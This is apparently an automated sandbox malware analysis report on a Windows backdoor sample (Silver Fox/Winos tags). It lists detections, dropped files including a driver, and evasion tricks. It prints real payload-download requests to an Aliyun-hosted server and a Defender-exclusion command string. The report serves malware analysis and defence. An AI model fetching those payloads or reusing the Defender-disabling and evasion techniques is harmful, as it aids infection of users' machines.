Edit tour

Windows Analysis Report
2362476847-83854387.07.exe

Overview

General Information

Sample name:2362476847-83854387.07.exe
Analysis ID:1586429
MD5:d7fbf8a45ea736f05b15de0c985b343d
SHA1:f988e97b3d3a4ab12cc09c73f61f1036c133ac4d
SHA256:889d53f0805721fc02707b8eceadf846274e7e427620e2dda8b7d86c29f034e8
Tags:backdoorexemsisilverfoxwinosuser-zhuzhu0009
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Drops PE files to the document folder of the user
Found direct / indirect Syscall (likely to bypass EDR)
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Sample is not signed and drops a device driver
Tries to detect virtualization through RDTSC time measurements
AV process strings found (often used to terminate AV products)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates driver files
Creates files inside the driver directory
Creates files inside the system directory
Detected non-DNS traffic on DNS port
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample file is different than original file name gathered from version info
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • 2362476847-83854387.07.exe (PID: 4476 cmdline: "C:\Users\user\Desktop\2362476847-83854387.07.exe" MD5: D7FBF8A45EA736F05B15DE0C985B343D)
  • WMZOAN.exe (PID: 1748 cmdline: C:\Users\user\Documents\WMZOAN.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
12.2.WMZOAN.exe.27f0000.1.unpackINDICATOR_SUSPICIOUS_DisableWinDefenderDetects executables containing artifcats associated with disabling Widnows DefenderditekSHen
  • 0x1fb0f:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fbc2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fcd2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fc20:$e2: Add-MpPreference -ExclusionPath
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: 2362476847-83854387.07.exeVirustotal: Detection: 22%Perma Link
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Source: unknownHTTPS traffic detected: 59.110.190.44:443 -> 192.168.2.7:49681 version: TLS 1.2
Source: Binary string: d:\adobe\AIR\code\build\win\results\Release\info\CaptiveAppEntry.vc2015.pdb source: 2362476847-83854387.07.exe
Source: Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: 189atohci.sys.0.dr
Source: Binary string: y:\avsdk5\engine\make\build\public\64-bit\vseamps.pdb source: WMZOAN.exe, 0000000C.00000000.2236498248.0000000140014000.00000002.00000001.01000000.00000008.sdmp, WMZOAN.exe, 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmp, WMZOAN.exe.0.dr
Source: C:\Users\user\Documents\WMZOAN.exeCode function: 12_2_00007FFB23B0A1B8 FindFirstFileExW,12_2_00007FFB23B0A1B8
Source: C:\Users\user\Documents\WMZOAN.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]12_2_000000014000DFFE
Source: C:\Users\user\Documents\WMZOAN.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]12_2_000000014000DDFF
Source: C:\Users\user\Documents\WMZOAN.exeCode function: 4x nop then movsxd rbx, qword ptr [r14+10h]12_2_0000000140011270
Source: C:\Users\user\Documents\WMZOAN.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]12_2_000000014000DE96
Source: C:\Users\user\Documents\WMZOAN.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]12_2_000000014000DEFB
Source: C:\Users\user\Documents\WMZOAN.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]12_2_000000014000E178
Source: C:\Users\user\Documents\WMZOAN.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]12_2_000000014000DDD9
Source: global trafficTCP traffic: 192.168.2.7:49447 -> 1.1.1.1:53
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /i.dat HTTP/1.1User-Agent: GetDataHost: a8mw1y.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /a.gif HTTP/1.1User-Agent: GetDataHost: a8mw1y.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /b.gif HTTP/1.1User-Agent: GetDataHost: a8mw1y.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /c.gif HTTP/1.1User-Agent: GetDataHost: a8mw1y.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d.gif HTTP/1.1User-Agent: GetDataHost: a8mw1y.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /s.dat HTTP/1.1User-Agent: GetDataHost: a8mw1y.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /s.jpg HTTP/1.1User-Agent: GetDataHost: a8mw1y.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficDNS traffic detected: DNS query: a8mw1y.oss-cn-beijing.aliyuncs.com
Source: 189atohci.sys.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
Source: 189atohci.sys.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: 189atohci.sys.0.dr, WMZOAN.exe.0.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: 189atohci.sys.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 189atohci.sys.0.drString found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
Source: 189atohci.sys.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 189atohci.sys.0.drString found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
Source: 189atohci.sys.0.drString found in binary or memory: http://ocsp.digicert.com0I
Source: 189atohci.sys.0.drString found in binary or memory: http://ocsp.digicert.com0P
Source: 189atohci.sys.0.dr, WMZOAN.exe.0.drString found in binary or memory: http://ocsp.thawte.com0
Source: WMZOAN.exe.0.drString found in binary or memory: http://s.symcb.com/pca3-g5.crl0
Source: WMZOAN.exe.0.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: WMZOAN.exe.0.drString found in binary or memory: http://s.symcd.com06
Source: WMZOAN.exe.0.drString found in binary or memory: http://s.symcd.com0_
Source: WMZOAN.exe.0.drString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: WMZOAN.exe.0.drString found in binary or memory: http://s2.symcb.com0
Source: WMZOAN.exe.0.drString found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: WMZOAN.exe.0.drString found in binary or memory: http://sv.symcb.com/sv.crt0
Source: WMZOAN.exe.0.drString found in binary or memory: http://sv.symcd.com0&
Source: WMZOAN.exe.0.drString found in binary or memory: http://sw.symcb.com/sw.crl0
Source: WMZOAN.exe.0.drString found in binary or memory: http://sw.symcd.com0
Source: WMZOAN.exe.0.drString found in binary or memory: http://sw1.symcb.com/sw.crt0
Source: WMZOAN.exe.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: 189atohci.sys.0.dr, WMZOAN.exe.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: WMZOAN.exe.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: 189atohci.sys.0.dr, WMZOAN.exe.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: 189atohci.sys.0.dr, WMZOAN.exe.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: WMZOAN.exe.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: 189atohci.sys.0.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: WMZOAN.exe.0.drString found in binary or memory: http://www.symauth.com/cps0(
Source: WMZOAN.exe.0.drString found in binary or memory: http://www.symauth.com/rpa00
Source: 2362476847-83854387.07.exe, 00000000.00000003.2099499956.00000000004AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a8mw1y.oss-cn-beijing.aliyuncs.com/
Source: 2362476847-83854387.07.exe, 00000000.00000003.2099499956.0000000000508000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a8mw1y.oss-cn-beijing.aliyuncs.com/7-2476756634-1003f
Source: 2362476847-83854387.07.exe, 00000000.00000003.2099499956.0000000000508000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a8mw1y.oss-cn-beijing.aliyuncs.com/7-2476756634-1003he
Source: 2362476847-83854387.07.exe, 00000000.00000003.2099499956.0000000000508000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a8mw1y.oss-cn-beijing.aliyuncs.com/a.gif
Source: 2362476847-83854387.07.exe, 00000000.00000003.2099499956.0000000000508000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a8mw1y.oss-cn-beijing.aliyuncs.com/a.gif.
Source: 2362476847-83854387.07.exe, 00000000.00000003.2099499956.0000000000508000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a8mw1y.oss-cn-beijing.aliyuncs.com/a.gifhttps://a8mw1y.oss-cn-beijing.aliyuncs.com/b.gifhttp
Source: 2362476847-83854387.07.exe, 00000000.00000003.2099499956.0000000000508000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a8mw1y.oss-cn-beijing.aliyuncs.com/b.gif
Source: 2362476847-83854387.07.exe, 00000000.00000003.2099499956.0000000000508000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a8mw1y.oss-cn-beijing.aliyuncs.com/b.gif&
Source: 2362476847-83854387.07.exe, 00000000.00000003.2099499956.0000000000508000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a8mw1y.oss-cn-beijing.aliyuncs.com/b.gifJ
Source: 2362476847-83854387.07.exe, 00000000.00000003.2099499956.0000000000508000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a8mw1y.oss-cn-beijing.aliyuncs.com/b.gifR
Source: 2362476847-83854387.07.exe, 00000000.00000003.2099499956.0000000000508000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a8mw1y.oss-cn-beijing.aliyuncs.com/b.gifcom
Source: 2362476847-83854387.07.exe, 00000000.00000003.2099499956.0000000000508000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a8mw1y.oss-cn-beijing.aliyuncs.com/b.gifp
Source: 2362476847-83854387.07.exe, 00000000.00000003.2099499956.0000000000508000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a8mw1y.oss-cn-beijing.aliyuncs.com/c.gif
Source: 2362476847-83854387.07.exe, 00000000.00000003.2099499956.0000000000508000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a8mw1y.oss-cn-beijing.aliyuncs.com/d.gif
Source: 2362476847-83854387.07.exe, 00000000.00000003.2099499956.00000000004AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a8mw1y.oss-cn-beijing.aliyuncs.com/i.dat
Source: 2362476847-83854387.07.exe, 00000000.00000003.2099499956.00000000004AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a8mw1y.oss-cn-beijing.aliyuncs.com/rt
Source: 2362476847-83854387.07.exe, 00000000.00000003.2099499956.00000000004AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a8mw1y.oss-cn-beijing.aliyuncs.com/tt
Source: 2362476847-83854387.07.exeString found in binary or memory: https://airsdk.harman.com/runtime
Source: 2362476847-83854387.07.exeString found in binary or memory: https://airsdk.harman.com/runtime.kernel32.dll
Source: WMZOAN.exe.0.drString found in binary or memory: https://d.symcb.com/cps0%
Source: WMZOAN.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0
Source: WMZOAN.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0)
Source: WMZOAN.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0.
Source: 189atohci.sys.0.drString found in binary or memory: https://www.digicert.com/CPS0
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49687
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49686
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49685
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49684
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49683
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49682
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49681
Source: unknownNetwork traffic detected: HTTP traffic on port 49686 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49685 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49683 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49684 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49687 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49682 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49681 -> 443
Source: unknownHTTPS traffic detected: 59.110.190.44:443 -> 192.168.2.7:49681 version: TLS 1.2

System Summary

barindex
Source: 12.2.WMZOAN.exe.27f0000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: C:\Users\user\Documents\WMZOAN.exeCode function: 12_2_0000000140006C95 NtAllocateVirtualMemory,12_2_0000000140006C95
Source: C:\Users\user\Documents\WMZOAN.exeCode function: 12_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,12_2_0000000140001520
Source: C:\Users\user\Desktop\2362476847-83854387.07.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
Source: C:\Users\user\Desktop\2362476847-83854387.07.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
Source: C:\Users\user\Desktop\2362476847-83854387.07.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
Source: C:\Users\user\Documents\WMZOAN.exeCode function: 12_2_000000014000C3F012_2_000000014000C3F0
Source: C:\Users\user\Documents\WMZOAN.exeCode function: 12_2_000000014000CC0012_2_000000014000CC00
Source: C:\Users\user\Documents\WMZOAN.exeCode function: 12_2_0000000140001A3012_2_0000000140001A30
Source: C:\Users\user\Documents\WMZOAN.exeCode function: 12_2_000000014000C2A012_2_000000014000C2A0
Source: C:\Users\user\Documents\WMZOAN.exeCode function: 12_2_00000001400022C012_2_00000001400022C0
Source: C:\Users\user\Documents\WMZOAN.exeCode function: 12_2_00000001400110F012_2_00000001400110F0
Source: C:\Users\user\Documents\WMZOAN.exeCode function: 12_2_0000000140010CF012_2_0000000140010CF0
Source: C:\Users\user\Documents\WMZOAN.exeCode function: 12_2_000000014000930012_2_0000000140009300
Source: C:\Users\user\Documents\WMZOAN.exeCode function: 12_2_000000014000BB7012_2_000000014000BB70
Source: C:\Users\user\Documents\WMZOAN.exeCode function: 12_2_0000000140003F8012_2_0000000140003F80
Source: C:\Users\user\Documents\WMZOAN.exeCode function: 12_2_00000001400103D012_2_00000001400103D0
Source: C:\Users\user\Documents\WMZOAN.exeCode function: 12_2_00007FFB23B1024812_2_00007FFB23B10248
Source: C:\Users\user\Documents\WMZOAN.exeCode function: 12_2_00007FFB23B0A1B812_2_00007FFB23B0A1B8
Source: Joe Sandbox ViewDropped File: C:\Users\user\Documents\WMZOAN.exe D2537DC4944653EFCD48DE73961034CFD64FB7C8E1BA631A88BBA62CCCC11948
Source: 2362476847-83854387.07.exe, 00000000.00000003.2138959008.0000000004828000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSa.dllp( vs 2362476847-83854387.07.exe
Source: 2362476847-83854387.07.exe, 00000000.00000000.1216438519.0000000141D74000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameVideoScribe.exeH vs 2362476847-83854387.07.exe
Source: 2362476847-83854387.07.exeBinary or memory string: OriginalFilenameVideoScribe.exeH vs 2362476847-83854387.07.exe
Source: 12.2.WMZOAN.exe.27f0000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 189atohci.sys.0.drBinary string: \Device\Driver\
Source: 189atohci.sys.0.drBinary string: \Device\TrueSight
Source: classification engineClassification label: mal80.evad.winEXE@2/12@1/1
Source: C:\Users\user\Documents\WMZOAN.exeCode function: 12_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,12_2_0000000140003F80
Source: C:\Users\user\Documents\WMZOAN.exeCode function: GetModuleFileNameW,OpenSCManagerW,GetLastError,CreateServiceW,CloseServiceHandle,GetLastError,CloseServiceHandle,12_2_0000000140001430
Source: C:\Users\user\Documents\WMZOAN.exeCode function: 12_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,12_2_0000000140001520
Source: C:\Users\user\Documents\WMZOAN.exeCode function: 12_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,12_2_0000000140001520
Source: C:\Users\user\Desktop\2362476847-83854387.07.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\i[1].datJump to behavior
Source: C:\Users\user\Desktop\2362476847-83854387.07.exeMutant created: \Sessions\1\BaseNamedObjects\26f3475fc22
Source: 2362476847-83854387.07.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\2362476847-83854387.07.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: 2362476847-83854387.07.exeVirustotal: Detection: 22%
Source: C:\Users\user\Desktop\2362476847-83854387.07.exeFile read: C:\Users\user\Desktop\2362476847-83854387.07.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\2362476847-83854387.07.exe "C:\Users\user\Desktop\2362476847-83854387.07.exe"
Source: unknownProcess created: C:\Users\user\Documents\WMZOAN.exe C:\Users\user\Documents\WMZOAN.exe
Source: C:\Users\user\Desktop\2362476847-83854387.07.exeSection loaded: pid.dllJump to behavior
Source: C:\Users\user\Desktop\2362476847-83854387.07.exeSection loaded: hid.dllJump to behavior
Source: C:\Users\user\Desktop\2362476847-83854387.07.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\2362476847-83854387.07.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\2362476847-83854387.07.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\2362476847-83854387.07.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\2362476847-83854387.07.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\2362476847-83854387.07.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\2362476847-83854387.07.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\2362476847-83854387.07.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\2362476847-83854387.07.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\2362476847-83854387.07.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\2362476847-83854387.07.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\2362476847-83854387.07.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\2362476847-83854387.07.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\2362476847-83854387.07.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\2362476847-83854387.07.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\2362476847-83854387.07.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\2362476847-83854387.07.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\2362476847-83854387.07.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\2362476847-83854387.07.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\2362476847-83854387.07.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\2362476847-83854387.07.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\2362476847-83854387.07.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\2362476847-83854387.07.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\2362476847-83854387.07.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\2362476847-83854387.07.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\2362476847-83854387.07.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\2362476847-83854387.07.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\2362476847-83854387.07.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\2362476847-83854387.07.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\2362476847-83854387.07.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Users\user\Desktop\2362476847-83854387.07.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Users\user\Desktop\2362476847-83854387.07.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Users\user\Documents\WMZOAN.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Documents\WMZOAN.exeSection loaded: vselog.dllJump to behavior
Source: C:\Users\user\Documents\WMZOAN.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\2362476847-83854387.07.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
Source: 2362476847-83854387.07.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: 2362476847-83854387.07.exeStatic file information: File size 30958080 > 1048576
Source: 2362476847-83854387.07.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x1d58400
Source: 2362476847-83854387.07.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 2362476847-83854387.07.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 2362476847-83854387.07.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 2362476847-83854387.07.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 2362476847-83854387.07.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 2362476847-83854387.07.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: 2362476847-83854387.07.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: d:\adobe\AIR\code\build\win\results\Release\info\CaptiveAppEntry.vc2015.pdb source: 2362476847-83854387.07.exe
Source: Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: 189atohci.sys.0.dr
Source: Binary string: y:\avsdk5\engine\make\build\public\64-bit\vseamps.pdb source: WMZOAN.exe, 0000000C.00000000.2236498248.0000000140014000.00000002.00000001.01000000.00000008.sdmp, WMZOAN.exe, 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmp, WMZOAN.exe.0.dr
Source: 2362476847-83854387.07.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 2362476847-83854387.07.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 2362476847-83854387.07.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 2362476847-83854387.07.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 2362476847-83854387.07.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Documents\WMZOAN.exeCode function: 12_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,12_2_000000014000F000

Persistence and Installation Behavior

barindex
Source: C:\Users\user\Desktop\2362476847-83854387.07.exeFile created: C:\Users\user\Documents\WMZOAN.exeJump to dropped file
Source: C:\Users\user\Desktop\2362476847-83854387.07.exeFile created: C:\Users\user\Documents\vselog.dllJump to dropped file
Source: C:\Users\user\Desktop\2362476847-83854387.07.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
Source: C:\Users\user\Desktop\2362476847-83854387.07.exeFile created: C:\Users\user\Documents\WMZOAN.exeJump to dropped file
Source: C:\Users\user\Desktop\2362476847-83854387.07.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to dropped file
Source: C:\Users\user\Desktop\2362476847-83854387.07.exeFile created: C:\Users\user\Documents\vselog.dllJump to dropped file
Source: C:\Users\user\Desktop\2362476847-83854387.07.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to dropped file
Source: C:\Users\user\Documents\WMZOAN.exeCode function: 12_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,12_2_0000000140001520

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Users\user\Documents\WMZOAN.exeMemory written: PID: 1748 base: 7FFB2D030008 value: E9 EB D9 E9 FF Jump to behavior
Source: C:\Users\user\Documents\WMZOAN.exeMemory written: PID: 1748 base: 7FFB2CECD9F0 value: E9 20 26 16 00 Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\2362476847-83854387.07.exeRDTSC instruction interceptor: First address: 1400010CB second address: 1400010E2 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec eax 0x0000000a mov ecx, eax 0x0000000c nop 0x0000000d nop 0x0000000e dec eax 0x0000000f xor edx, edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 fldpi 0x00000015 frndint 0x00000017 rdtsc
Source: C:\Users\user\Desktop\2362476847-83854387.07.exeRDTSC instruction interceptor: First address: 1400010E2 second address: 1400010E2 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 xor ebx, ebx 0x00000009 dec eax 0x0000000a mov ebx, edx 0x0000000c dec eax 0x0000000d or eax, ebx 0x0000000f dec eax 0x00000010 sub eax, ecx 0x00000012 nop 0x00000013 dec ebp 0x00000014 xor edx, edx 0x00000016 dec esp 0x00000017 mov edx, eax 0x00000019 dec ebp 0x0000001a cmp edx, eax 0x0000001c jc 00007F5EA91AAE70h 0x0000001e fldpi 0x00000020 frndint 0x00000022 rdtsc
Source: C:\Users\user\Desktop\2362476847-83854387.07.exeWindow / User API: threadDelayed 545Jump to behavior
Source: C:\Users\user\Desktop\2362476847-83854387.07.exeWindow / User API: threadDelayed 454Jump to behavior
Source: C:\Users\user\Desktop\2362476847-83854387.07.exeDropped PE file which has not been started: C:\Windows\System32\drivers\189atohci.sysJump to dropped file
Source: C:\Users\user\Documents\WMZOAN.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_12-14043
